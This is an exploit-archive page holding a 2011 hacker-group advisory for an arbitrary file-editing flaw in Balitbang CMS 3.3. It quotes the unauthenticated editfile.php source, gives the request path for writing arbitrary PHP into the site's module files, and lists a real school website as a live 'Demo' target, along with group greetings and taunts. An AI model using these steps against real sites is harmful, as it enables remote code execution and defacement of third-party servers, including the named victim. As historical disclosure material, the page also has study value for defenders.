Balitbang CMS 3.3 File Edit

Balitbang CMS 3.3 File Edit: Posted Mar 19, 2011; Authored by Xr0b0t; Balitbang CMS version 3.3 suffers from an arbitrary file editing vulnerability that can allow a remote attacker arbitrary php code execution.; tags | exploit, remote, arbitrary, php, code execution; SHA-256 | 51ee4c34c19dee6c937cc60f2b6ba853b66edc84acace28c86c0de3131bf3dbc; Download | Favorite | View

Balitbang CMS 3.3 File Edit

[!]===========================================================================[!]

[~] CMS Balitbang Edit File Vulnerability 
[~] Author : Xr0b0t (xrt.interpol@gmx.us)
[~] Homepage : www.indonesiancoder.com | xrobot.mobi | mc-crew.net | exploit-id.com
[~] Date : 18 Mart, 2010
[~] Tested on : BlackBuntu RC2

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : kajianwebsite.org
[+] Download : http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip
[+] Price : free
[+] Vulnerability : Local File Editing
[+] Dork : Xr0b0t Was Here ;)
[+] Version : version 3.3

[!]===========================================================================[!]

[ Default Site ]
    http://127.0.0.1/



[ XpL ]

    http://127.0.0.1/litbang//functions/editfile.php
  
  [code]
  <?php
  if ($save=='simpan') {
    $dwrite = fopen("../modul/tag_".$file.".php", "w");
    $nfile = stripslashes($nfile);
    fputs ($dwrite, $nfile);
    fclose ($dwrite);
    echo "File sudah disimpan....Silahkan tutup jendela ini";
    //header("Location: ../admin/admin.php?mode=konf&kd=berhasil");
  }
  else {
    $dread = file("../modul/tag_".$file.".php");
  for ($i=0; $i <= count($dread); $i++) {
    $output .= $dread[$i];
  }
  echo "<form action='editfile.php' method=post>File Name : <input type=text name=nmfile value='tag_".$file.".php'> Jarngan diganti<br><textarea name=nfile cols=80 rows=20>$output</textarea><br><input type=hidden name=file value='$file' >
  <input type=submit value='Simpan' ><input type=hidden name='save' value='simpan' ></form>";
  
  }
  ?>




[ Result In ]

    http://127.0.0.1/litbang//modul/tag_.php
  
[ Demo ]
  
  exploit : http://www.smkn3-magelang.com//functions/editfile.php
  
  Result  : http://www.smkn3-magelang.com/modul/tag_.php
  

  

etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] Don Tukulesto DUDUl Kok G rene2... Kal0ng 666 Cepet Jadikan Ntu PRoyek
[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Geni212


[ NOTE ]

[+] OJOK JOTOS2an YO ..
[+] Minggir semua Arumbia Team Mau LEwat ;)
[+] MBEM : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x...
[+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..
[+] Malang Cyber Crew & Magelang Cyber Community

Top Authors In Last 30 Days

Red Hat 244 files
Ubuntu 65 files
LiquidWorm 24 files
Debian 18 files
indoushka 15 files
Apple 9 files
Google Security Research 7 files
Gentoo 5 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,155)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,819)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,239)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,968)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Balitbang CMS 3.3 File Edit

Balitbang CMS 3.3 File Edit

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Balitbang CMS 3.3 File Edit

Share This

Balitbang CMS 3.3 File Edit

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems